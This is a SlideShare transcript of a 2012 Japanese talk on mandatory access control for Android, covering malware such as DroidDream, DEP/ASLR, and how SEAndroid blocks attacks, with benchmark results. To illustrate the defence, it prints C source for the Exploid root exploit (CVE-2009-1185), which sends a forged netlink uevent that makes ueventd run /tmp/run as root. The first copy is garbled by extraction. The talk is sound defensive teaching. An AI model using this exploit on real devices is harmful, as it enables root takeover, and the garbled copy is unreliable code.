SlideShare a Scribd company logo
1 of 92
Androidにおける
強制アクセス制御
情報科学若手の会 2012/09/15
自己紹介

矢倉 大夢

@hiromu1996 

つい数日前に0x10歳に
自己紹介

セキュリティ&プログラミングキャンプ2010

Linuxカーネル組

最年少情報セキュリティスペシャリスト
Android

Androidデバイス持っていますか?

 まあiPhone便利だよね

 Androidってあれでしょ,ウイルスとか
Androidってアレ
Androidのマルウェア検知数の推移
突然のマルウェア増加

原因は?

Android台数の増加

Androidマルウェアが   かる
Androidの台数推移
Androidのアクティベーション台数




      http://www.asymco.com/2011/12/21/how-many-android-phones-have-been-activated/
マルウェアは かる?

Android = スマートフォン

 スマートフォンには個人情報がいっぱい

  アカウント情報

  電話帳
よくある手法

アプリケーションが勝手にSMSを送る

SMSで料金支払いができる

勝手にお金が使われる
よくある手法

携帯キャリアから請求書がきて

     _人人人人人人_
    > 突然の死 <
     ̄^Y^Y^Y^Y^ ̄
セキュリティがザル?


Androidのセキュリティシステムがザル...?

SandboxとかPermissionとか聞くけど
アーキテクチャ
アーキテクチャ
アーキテクチャ

アプリケーションレイヤー

ホームアプリケーション

ブラウザー

その他すべてのアプリケーション
アーキテクチャ
アーキテクチャ

アプリケーションフレームワーク

Androidが用意しているAPIなど

 Location Manager 

  位置情報を取得するのに必要
アーキテクチャ
アーキテクチャ

Dalvic VM 

 Android向けJava Virtual Machine

  dex形式のクラスファイルを使用
アーキテクチャ
アーキテクチャ


ライブラリ

アプリケーション内でNative実行される

 OpenGLやOpenSSLのライブラリ

 Webkitのコア
アーキテクチャ
アーキテクチャ

Linuxカーネル

言わずと知れた基幹部分

  タスク,デバイスの管理とかいろいろ
セキュリティ機構

SandBoxとPermission

 アプリケーション間の分離

 アクセスできるリソースの制限
サンドボックス

 AppID 1       AppID 2

パーミッション      パーミッション

 SMS         Internet

       電話帳          GPS


                    Android OS
サンドボックス

 AppID 1       AppID 2

パーミッション      パーミッション

 SMS         Internet

       電話帳          GPS


                    Android OS
サンドボックス


アプリケーションごとにUIDを付与

UIDを用いて,一般のLinuxと同じよう
に制御
パーミッション

パーミッションに基づいてアクセスできる
リソースを制限

電話帳データを読み取るには
READ_CONTACTSが必要
結局

怪しいパーミッションを要求しないアプリ
ケーションだけをインストールすればよい

SEND_SMS

READ_CONTACT
それだけじゃない

それだけでは十分な対策とはいえない

Linux Kernelの脆弱性を突くマルウェア

 root権限を奪取する
実例

実際にroot権限を奪取するマルウェア

 DroidDream

  Androidで一番最初に発見された
  ”削除できない”マルウェア
DroidDream

2011年3月に発見されたマルウェア

 脆弱性を利用してroot権限を奪取

 ユーザーが削除できない領域に
 別のマルウェアをインストール
DroidDream

Android Marketでも配布されていたことが
判明し,騒ぎに

 既存アプリケーションにマルウェアを
 突っ込んで再パッケージしたものなど
DroidDream

DroidDreamは2種類の脆弱性を利用

 CVE-2010-EASY(rageageinstthecage)で
 始めに試行

 失敗すればCVE-2009-1185で試行
対策

アンチウイルスを入れとけばいいんじゃね

ウイルス⃝スターとか

最近話題のキ⃝グソフトとか
アンチウイルス

果たしてアンチウイルスは有効なのか?

現状ではあまり有効とはいえない

というかAndroidのアンチウイルスって
どんなことしてくれんの?
アンチウイルス


ファイルがダウンロードされました

スキャンしてマルウェアと判断すれば
削除
アンチウイルス

SDカードが挿入されました

SDカードのファイルをすべてスキャン

マルウェアがあれば削除
アンチウイルス


一見,ちゃんと動いてくれそう

だが,Androidのセキュリティシステムが
逆にアンチウイルスの働きを阻害している
アンチウイルス

アンチウイルスはSandboxの中で動作する

 他のアプリケーションのリソースに
 アクセスできない

 他のプロセスに干渉することができない
アンチウイルス

当然,動的なヒューリスティック解析は
Androidのアーキテクチャ上,不可能

 System Callをフックするとかできるわけ
 ない
アンチウイルス

スキャンによるシグネチャベースの検知

検体の収集が追いついていない

ベンダーにより検出率に大きなばらつき
アンチウイルス

Androidのアンチウイルスソフトはあまり
あてにならない

 べ,べつにセキュリティ会社をdisってる
 わけじゃないんだからね

 Androidアーキテクチャ上,仕方がない
ソフトウェアの更新


脆弱性があったなら,更新パッチ当てれば
被害はだいぶ抑えられるんじゃねーの?

うん,そうなんだけど....
ソフトウェアの更新

Androidの脆弱性対策が非常に遅いのも
大きな問題の一つ

 2011年6月にIPAがレポートを出す

  DroidDreamで使用されている
  脆弱性への対応状況について
ソフトウェアの更新
IPAのレポートより
ソフトウェアの更新


脆弱性を悪用するマルウェアの存在が
発覚してから3ヶ月経っている

それでも対策が不十分な機種が2つ
ソフトウェアの更新

そもそも脆弱性が発見されたのは

CVE-2009-1185が2009年3月

CVE-2010-EASYが2010年8月
ソフトウェアの更新


Androidは脆弱性が見つかって1年経っても
対応されていなかったりする...

 どうしてこうなった....
ソフトウェア更新

原因は,ベンダーの対応の遅さ

差別化のために様々なカスタマイズを
OSに施している

 パッチの適用に時間がかかる
マルウェアへの対策

他に対策はないのか?

DEP, ASLR 

LSM 
DEP

バッファオーバーフローによる
任意コードの実行を防止する仕組み

脆弱性の多くがバッファオーバーフロー
によるものなので対策として有効
DEP

メモリに展開されているコードとデータを
区別する

バッファオーバーフローを利用して
データの部分に任意のコードを
書き込んでも実行できない
DEP
メモリ
コード
スタック
         ここに脆弱性がある

データ
DEP
メモリ
コード
スタック
         任意のコードを
             突っ込める
データ
DEP
メモリ
コード     スタックを書き換えて
スタック     先ほどのコードを
             呼び出し
データ
DEP
メモリ
コード
         DEPがあるので
スタック
       データ領域にあるコードは
             実行されない
データ
DEP

Android 2.3以降で有効化されている

 iOSでは2.0以降で使える

DEPに必要なライブラリに攻撃すれば
無効化することも可能であった
ASLR

アドレス空間配置のランダム化

プロセスがメモリ上でどこに配置される
かをランダム化できるようになった

攻撃の標的を見つけられないようになる
ASLR

攻撃対象のメモリアドレスがわからないと
攻撃が困難に

DEPのライブラリを攻撃することもほぼ
不可能

Exploitの作成を困難に
ASLR

Android 4.0でやっと有効に

 ただ,実装がひどかったので
 実質使えるのはAndroid 4.0.1以降

 iOSでは4.3以降で使える
マルウェアへの対策


やっとiOSに追いついてきたレベル

まだコード署名が必要と言われている
LSM

Linux Security Moduleの利用

 Androidをもっと堅牢化する仕組み

 カーネルに組み込んで使用
LSM

LSMといえば

AppArmor

SELinux

TOMOYO Linux
LSM

Linuxサーバーなどで既に利用されている

 System Callなどが管理者の定めた
 ポリシーに則っているかをチェックする

その仕組みをAndroidでも利用
Deckard / Miyabi
Sharpが開発したAndroid向けLSM

 システムパーティションへの
 書き込み制限

 デバッグ機能の禁止

IS01などで使われている
Tomoyo on Android

Tomoyo Linux 

 LSMの1つでカードキャプターさくらが
 名前の由来

 ポリシーを簡単に記述できるのが利点
Tomoyo on Android


Tomoyo on AndroidはTomoyo Linuxを
Android向けに移植したもの

富士通のP-04Dにはすでに搭載されている
SEAndroid

2012年1月にリリースされた

 SELinuxをAndroidに移植したもの

 アメリカ国家安全保障局が主体となって
 開発
LSMでできること

強制アクセス制御

ファイルの所有者でも,アクセス権限を
変更できない

アクセス権限は,管理者の定めた
ポリシーによって設定される
LSMでできること

細かい権限設定

 Permissionモデルよりポリシーを使って
 管理者が細かく権限を設定できる

Androidではベンダーがインストールした
ポリシーはrootでも変更不能にできる
LSMでできること

SEAndroidで脆弱性に対して有効かどうか
ためしてみる

 SEAndroidにはNSAが作ったデフォルト
 ポリシーがあるので,それで試してみる
SEAndroidの有効事例

Exploit.AndroidOS.lotoor

 DroidDreamとして拡散

 AndroidMarketで提供されたことも
SEAndroidの有効事例
Exploidを使用してroot権限を奪取

 CVE-2009-1185のExploit

  ueventdの脆弱性

  netlinkメッセージの部分に脆弱性
SEAndroidの有効事例
ueventdとは

 root権限で動作しているシステムプロセ
 ス

 /dev以下の管理を行なっている

 Linuxでいうudevのようなもの
SEAndroidの有効事例
   Exploitコード



int main(int argc, char **argv)
{

     int sock;

     char *mp;

     char message[4096];

     struct msghdr msg;

     struct iovec iovector;

     struct sockaddr_nl address;

     memset(&address, 0, sizeof(address));

     address.nl_familyatoi(argv[1]);

     address.nl_pid = = AF_NETLINK;

     address.nl_groups (void*)&address;

     msg.msg_name = = 0;

     msg.msg_namelen = sizeof(address);

     msg.msg_iov = &iovector;

     msg.msg_iovlen = 1;

     sock = socket(AF_NETLINK, *) &address, sizeof(address));

     bind(sock, (struct sockaddr SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);

     mp = message;

     mp += sprintf(mp, "SUBSYSTEM=block") ++ 1;

     mp += sprintf(mp, "DEVPATH=/dev/foo") 1;

     mp += sprintf(mp, "ACTION=remove") +1;

     mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;

     iovector.iov_base = (void*)message;

     iovector.iov_len&msg, 0);

     sendmsg(sock, = (int)(mp-message);

     close(sock);

     return 0;
}
SEAndroidの有効事例
 Exploitコード


struct sockaddr_nl address;
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;

struct msghdr msg;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
SEAndroidの有効事例
 Exploitコード


sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(sock, (struct sockaddr *) &address, sizeof(address));
mp = message;
mp += sprintf(mp, "SUBSYSTEM=block") + 1;
mp += sprintf(mp, "DEVPATH=/dev/foo") + 1;
mp += sprintf(mp, "ACTION=remove") +1;
mp += sprintf(mp, "REMOVE_CMD=/tmp/run") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
sendmsg(sock, &msg, 0);
close(sock);
SEAndroidの有効事例
AF_NETLINKにソケット通信

 カーネルとユーザーランドの通信用のソケット

 NETLINK_KOBJECT_UEVENT 

  ユーザーランドへのカーネルからの通信
SEAndroidの有効事例
SUBSYSTEM=BLOCK,
DEVPATH=/dev/foo,
ACTION=REMOVE,
REMOVE_CMD=/tmp/run

 /dev/fooというブロックデバイスが取り外
 された

 トリガーとして/tmp/runを実行
SEAndroidの有効事例
ueventdはソケット通信を受け取る

 /tmp/runを実行する

ueventdが通送り元を識別していないのが問題

 ユーザーランドからでも実行してしまう

  root権限として実行
SEAndroidの有効事例
SEAndroidはどう作用するのか

 アプリケーションからはNetlinkへ
 ソケット通信できない

 ueventdは/proc/sys/kernel/hotplugへ書き
 込めない

  ポリシーで制限されている
SEAndroidの有効事例


ポリシー次第では使える

 ※ただしセキュリティに限る
SEAndroidの実用性
速度

遅い,もっさり

QuadrantでBenchmarkとってみた

 Android 4.1で試しました
SEAndroidの実用性

Galaxy Nexus 平均: 2574

Galaxy Nexus (SEAndroid): 2057 

 Android 4.0の時より10%程度改善
SEAndroidの実用性
Normal         SEAndroid

CPU: 5661      CPU: 5558
Memory: 1804   Memory: 1756
I/O: 3533      I/O: 1658
2D: 346        2D: 269
3D: 1526       3D: 1024
SEAndroidの実用性
I/Oが重い

 SEAndroidはファイルのラベル情報を
 保存するためにファイルシステムに
 独自実装を加えている

 それがくっそ重いらしい
SEAndroidの実用性

動作が不安定

SEAndroidをEnforceにするとよく落ちる

 電話帳が無限ループに入って落ちたり
SEAndroidの実用性

SEAndroid使えない?

 実際に商用利用できるレベルではない

 落ちる問題に関しては,ポリシーを
 緩くするとある程度はマシになるはず
SEAndroidの実用性

こういう使い方もあるはず

SEAndroidのログからマルウェア検知?

組み込み系Androidならもっと使える?
SEAndroidの今後

開発チームはメインラインへのマージに
乗り気

すでにDalvik VMなどへの変更はマージ
されている

残りはKernelの部分など
SEAndroidの今後
どっちにしろAndroidには強制アクセス
制御の利用が必要なはず

 数年のうちにデフォルトになっていると
 嬉しい

 Androidのセキュリティも
 マシになるはず
ご清聴ありがとうございました




質問タイム

More Related Content

What's hot

Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 VulsInternet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 VulsKota Kanbe
 
IoTセキュリティの最新動向
IoTセキュリティの最新動向IoTセキュリティの最新動向
IoTセキュリティの最新動向Takao Okubo
 
セキュアエレメントとIotデバイスセキュリティ2
セキュアエレメントとIotデバイスセキュリティ2セキュアエレメントとIotデバイスセキュリティ2
セキュアエレメントとIotデバイスセキュリティ2Kentaro Mitsuyasu
 
脆弱性スキャナVulsで始めるセキュリティ対策
脆弱性スキャナVulsで始めるセキュリティ対策脆弱性スキャナVulsで始めるセキュリティ対策
脆弱性スキャナVulsで始めるセキュリティ対策Takayuki Ushida
 
20200127 jetson nano_chonyumon_kitazaki
20200127 jetson nano_chonyumon_kitazaki20200127 jetson nano_chonyumon_kitazaki
20200127 jetson nano_chonyumon_kitazakiAyachika Kitazaki
 
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...PacSecJP
 
Rainbowtype secure IoT prototyping system
Rainbowtype secure IoT prototyping systemRainbowtype secure IoT prototyping system
Rainbowtype secure IoT prototyping systemKentaro Mitsuyasu
 
Elastic stack 世界にさらしたサーバを可視化してみた
Elastic stack 世界にさらしたサーバを可視化してみたElastic stack 世界にさらしたサーバを可視化してみた
Elastic stack 世界にさらしたサーバを可視化してみたMasamitsu Maehara
 
IoTハンズオン資料(おうちハック)配布用
IoTハンズオン資料(おうちハック)配布用IoTハンズオン資料(おうちハック)配布用
IoTハンズオン資料(おうちハック)配布用Takashi Ariyama
 
IoTデバイスセキュリティ
IoTデバイスセキュリティIoTデバイスセキュリティ
IoTデバイスセキュリティKentaro Mitsuyasu
 
Sec014 ゼロデイ攻撃やラ
Sec014 ゼロデイ攻撃やラSec014 ゼロデイ攻撃やラ
Sec014 ゼロデイ攻撃やラTech Summit 2016
 
Linux Security
Linux SecurityLinux Security
Linux Securitysounakano
 
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムWiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムTakashi Yamanoue
 
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話Hibino Hisashi
 
デバイス内データの安全な保管を考える
デバイス内データの安全な保管を考えるデバイス内データの安全な保管を考える
デバイス内データの安全な保管を考えるKentaro Mitsuyasu
 
AVTOKYO2012 Android Malware Heuristics(jp)
AVTOKYO2012 Android Malware Heuristics(jp)AVTOKYO2012 Android Malware Heuristics(jp)
AVTOKYO2012 Android Malware Heuristics(jp)雅太 西田
 
ReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampYujiro Yahata
 

What's hot (20)

Vuls×deep security
Vuls×deep securityVuls×deep security
Vuls×deep security
 
Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 VulsInternet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
 
IoTセキュリティの最新動向
IoTセキュリティの最新動向IoTセキュリティの最新動向
IoTセキュリティの最新動向
 
セキュアエレメントとIotデバイスセキュリティ2
セキュアエレメントとIotデバイスセキュリティ2セキュアエレメントとIotデバイスセキュリティ2
セキュアエレメントとIotデバイスセキュリティ2
 
IoTハンズオン
IoTハンズオンIoTハンズオン
IoTハンズオン
 
脆弱性スキャナVulsで始めるセキュリティ対策
脆弱性スキャナVulsで始めるセキュリティ対策脆弱性スキャナVulsで始めるセキュリティ対策
脆弱性スキャナVulsで始めるセキュリティ対策
 
20200127 jetson nano_chonyumon_kitazaki
20200127 jetson nano_chonyumon_kitazaki20200127 jetson nano_chonyumon_kitazaki
20200127 jetson nano_chonyumon_kitazaki
 
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...Qinghao  vulnerabilities mining technology of cloud and virtualization platfo...
Qinghao vulnerabilities mining technology of cloud and virtualization platfo...
 
Rainbowtype secure IoT prototyping system
Rainbowtype secure IoT prototyping systemRainbowtype secure IoT prototyping system
Rainbowtype secure IoT prototyping system
 
Elastic stack 世界にさらしたサーバを可視化してみた
Elastic stack 世界にさらしたサーバを可視化してみたElastic stack 世界にさらしたサーバを可視化してみた
Elastic stack 世界にさらしたサーバを可視化してみた
 
IoTハンズオン資料(おうちハック)配布用
IoTハンズオン資料(おうちハック)配布用IoTハンズオン資料(おうちハック)配布用
IoTハンズオン資料(おうちハック)配布用
 
IoTデバイスセキュリティ
IoTデバイスセキュリティIoTデバイスセキュリティ
IoTデバイスセキュリティ
 
Sec014 ゼロデイ攻撃やラ
Sec014 ゼロデイ攻撃やラSec014 ゼロデイ攻撃やラ
Sec014 ゼロデイ攻撃やラ
 
Linux Security
Linux SecurityLinux Security
Linux Security
 
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システムWiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
Wiki と携帯型遠隔操作機器を使った情報セキュリティ対策システム
 
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
 
Outsmarting Smartphone Apps
Outsmarting Smartphone AppsOutsmarting Smartphone Apps
Outsmarting Smartphone Apps
 
デバイス内データの安全な保管を考える
デバイス内データの安全な保管を考えるデバイス内データの安全な保管を考える
デバイス内データの安全な保管を考える
 
AVTOKYO2012 Android Malware Heuristics(jp)
AVTOKYO2012 Android Malware Heuristics(jp)AVTOKYO2012 Android Malware Heuristics(jp)
AVTOKYO2012 Android Malware Heuristics(jp)
 
ReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccampReDos検出プログラムの作成とOSSへの適用 #seccamp
ReDos検出プログラムの作成とOSSへの適用 #seccamp
 

Viewers also liked

セキュリティ・キャンプのススメ
セキュリティ・キャンプのススメセキュリティ・キャンプのススメ
セキュリティ・キャンプのススメHiromu Yakura
 
あるクリスマスの話
あるクリスマスの話あるクリスマスの話
あるクリスマスの話nullnilaki
 
かーねるはっく with Android
かーねるはっく with Androidかーねるはっく with Android
かーねるはっく with AndroidHiromu Yakura
 
ナウいAndroidセキュリティ
ナウいAndroidセキュリティナウいAndroidセキュリティ
ナウいAndroidセキュリティHiromu Yakura
 
Why don't you learn programming?
Why don't you learn programming?Why don't you learn programming?
Why don't you learn programming?Hiromu Yakura
 
CTF, What's in it for me?
CTF, What's in it for me?CTF, What's in it for me?
CTF, What's in it for me?Hiromu Yakura
 
OSS奨励賞受賞プレゼン 活動紹介
OSS奨励賞受賞プレゼン 活動紹介OSS奨励賞受賞プレゼン 活動紹介
OSS奨励賞受賞プレゼン 活動紹介Hiromu Yakura
 
Arduinoでプログラミングに触れてみよう 続編
Arduinoでプログラミングに触れてみよう 続編Arduinoでプログラミングに触れてみよう 続編
Arduinoでプログラミングに触れてみよう 続編Hiromu Yakura
 
Trendmicro Security Award 2012 Final Presentation
Trendmicro Security Award 2012 Final PresentationTrendmicro Security Award 2012 Final Presentation
Trendmicro Security Award 2012 Final PresentationHiromu Yakura
 
新しいライブ映像再生システムを研究してみた
新しいライブ映像再生システムを研究してみた新しいライブ映像再生システムを研究してみた
新しいライブ映像再生システムを研究してみたHiromu Yakura
 
Arduinoでプログラミングに触れてみよう
Arduinoでプログラミングに触れてみようArduinoでプログラミングに触れてみよう
Arduinoでプログラミングに触れてみようHiromu Yakura
 
GAME ON 特別イベント 「ゲームってなんでプログラミング?」
GAME ON 特別イベント 「ゲームってなんでプログラミング?」GAME ON 特別イベント 「ゲームってなんでプログラミング?」
GAME ON 特別イベント 「ゲームってなんでプログラミング?」Hiromu Yakura
 
CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…Hiromu Yakura
 

Viewers also liked (16)

セキュリティ・キャンプのススメ
セキュリティ・キャンプのススメセキュリティ・キャンプのススメ
セキュリティ・キャンプのススメ
 
あるクリスマスの話
あるクリスマスの話あるクリスマスの話
あるクリスマスの話
 
かーねるはっく with Android
かーねるはっく with Androidかーねるはっく with Android
かーねるはっく with Android
 
ナウいAndroidセキュリティ
ナウいAndroidセキュリティナウいAndroidセキュリティ
ナウいAndroidセキュリティ
 
Why don't you learn programming?
Why don't you learn programming?Why don't you learn programming?
Why don't you learn programming?
 
ICTのちから
ICTのちからICTのちから
ICTのちから
 
Nyarlathotep
NyarlathotepNyarlathotep
Nyarlathotep
 
Arrow Judge
Arrow JudgeArrow Judge
Arrow Judge
 
CTF, What's in it for me?
CTF, What's in it for me?CTF, What's in it for me?
CTF, What's in it for me?
 
OSS奨励賞受賞プレゼン 活動紹介
OSS奨励賞受賞プレゼン 活動紹介OSS奨励賞受賞プレゼン 活動紹介
OSS奨励賞受賞プレゼン 活動紹介
 
Arduinoでプログラミングに触れてみよう 続編
Arduinoでプログラミングに触れてみよう 続編Arduinoでプログラミングに触れてみよう 続編
Arduinoでプログラミングに触れてみよう 続編
 
Trendmicro Security Award 2012 Final Presentation
Trendmicro Security Award 2012 Final PresentationTrendmicro Security Award 2012 Final Presentation
Trendmicro Security Award 2012 Final Presentation
 
新しいライブ映像再生システムを研究してみた
新しいライブ映像再生システムを研究してみた新しいライブ映像再生システムを研究してみた
新しいライブ映像再生システムを研究してみた
 
Arduinoでプログラミングに触れてみよう
Arduinoでプログラミングに触れてみようArduinoでプログラミングに触れてみよう
Arduinoでプログラミングに触れてみよう
 
GAME ON 特別イベント 「ゲームってなんでプログラミング?」
GAME ON 特別イベント 「ゲームってなんでプログラミング?」GAME ON 特別イベント 「ゲームってなんでプログラミング?」
GAME ON 特別イベント 「ゲームってなんでプログラミング?」
 
CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…CTFはとんでもないものを 盗んでいきました。私の時間です…
CTFはとんでもないものを 盗んでいきました。私の時間です…
 

Similar to Androidにおける強制アクセス制御

Malwat4 20130223 analyzing_android_malware
Malwat4 20130223 analyzing_android_malwareMalwat4 20130223 analyzing_android_malware
Malwat4 20130223 analyzing_android_malwareAyase
 
Inside Android Security
Inside Android SecurityInside Android Security
Inside Android SecurityFFRI, Inc.
 
Android Lecture #01 @PRO&BSC Inc.
Android Lecture #01 @PRO&BSC Inc.Android Lecture #01 @PRO&BSC Inc.
Android Lecture #01 @PRO&BSC Inc.Yuki Higuchi
 
Mr201302 mitb in_android_2
Mr201302 mitb in_android_2Mr201302 mitb in_android_2
Mr201302 mitb in_android_2FFRI, Inc.
 
Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~Naoya Niwa
 
ソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdf
ソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdfソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdf
ソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdf耕二 阿部
 
クラウドアプリケーション開発に必要なセキュリティ
クラウドアプリケーション開発に必要なセキュリティ クラウドアプリケーション開発に必要なセキュリティ
クラウドアプリケーション開発に必要なセキュリティ Lumin Hacker
 
Android: 設計上の技術的な問題点
Android: 設計上の技術的な問題点Android: 設計上の技術的な問題点
Android: 設計上の技術的な問題点FFRI, Inc.
 
アプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LT
アプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LTアプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LT
アプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LTaltplus-lab
 
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎ken_kitahara
 
侵入防御の誤検知を減らすためのDeepSecurity運用
侵入防御の誤検知を減らすためのDeepSecurity運用侵入防御の誤検知を減らすためのDeepSecurity運用
侵入防御の誤検知を減らすためのDeepSecurity運用morisshi
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座Toshiharu Harada, Ph.D
 
【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)
【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)
【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)Yuto Tachibana
 
[ABC2016S]Android Wear アプリ開発入門
[ABC2016S]Android Wear アプリ開発入門[ABC2016S]Android Wear アプリ開発入門
[ABC2016S]Android Wear アプリ開発入門Kenichi Kambara
 
OSS脆弱性スキャナー開発を始めた件について
OSS脆弱性スキャナー開発を始めた件についてOSS脆弱性スキャナー開発を始めた件について
OSS脆弱性スキャナー開発を始めた件についてssuser6c19e1
 
Java/Androidセキュアコーディング
Java/AndroidセキュアコーディングJava/Androidセキュアコーディング
Java/AndroidセキュアコーディングMasaki Kubo
 

Similar to Androidにおける強制アクセス制御 (20)

Malwat4 20130223 analyzing_android_malware
Malwat4 20130223 analyzing_android_malwareMalwat4 20130223 analyzing_android_malware
Malwat4 20130223 analyzing_android_malware
 
Inside Android Security
Inside Android SecurityInside Android Security
Inside Android Security
 
Permissionの日本語でおk
Permissionの日本語でおkPermissionの日本語でおk
Permissionの日本語でおk
 
Android Lecture #01 @PRO&BSC Inc.
Android Lecture #01 @PRO&BSC Inc.Android Lecture #01 @PRO&BSC Inc.
Android Lecture #01 @PRO&BSC Inc.
 
Mr201302 mitb in_android_2
Mr201302 mitb in_android_2Mr201302 mitb in_android_2
Mr201302 mitb in_android_2
 
Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~Androidとセキュリティ ~ユーザーを脅威から守る~
Androidとセキュリティ ~ユーザーを脅威から守る~
 
ソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdf
ソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdfソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdf
ソフトウェア設計原則【SOLID】を学ぶ #2 インターフェイス分離の原則.pdf
 
Css2013 api distance
Css2013 api distanceCss2013 api distance
Css2013 api distance
 
クラウドアプリケーション開発に必要なセキュリティ
クラウドアプリケーション開発に必要なセキュリティ クラウドアプリケーション開発に必要なセキュリティ
クラウドアプリケーション開発に必要なセキュリティ
 
Android: 設計上の技術的な問題点
Android: 設計上の技術的な問題点Android: 設計上の技術的な問題点
Android: 設計上の技術的な問題点
 
[Japan Tech summit 2017] DEP 003
[Japan Tech summit 2017]  DEP 003[Japan Tech summit 2017]  DEP 003
[Japan Tech summit 2017] DEP 003
 
アプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LT
アプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LTアプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LT
アプリ開発者向けハッキング対策ソリューション DxShieldのご紹介 / Monacaパートナー勉強会LT
 
FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎FridaによるAndroidアプリの動的解析とフッキングの基礎
FridaによるAndroidアプリの動的解析とフッキングの基礎
 
侵入防御の誤検知を減らすためのDeepSecurity運用
侵入防御の誤検知を減らすためのDeepSecurity運用侵入防御の誤検知を減らすためのDeepSecurity運用
侵入防御の誤検知を減らすためのDeepSecurity運用
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
闘うITエンジニアのためのLinuxセキュリティ講座
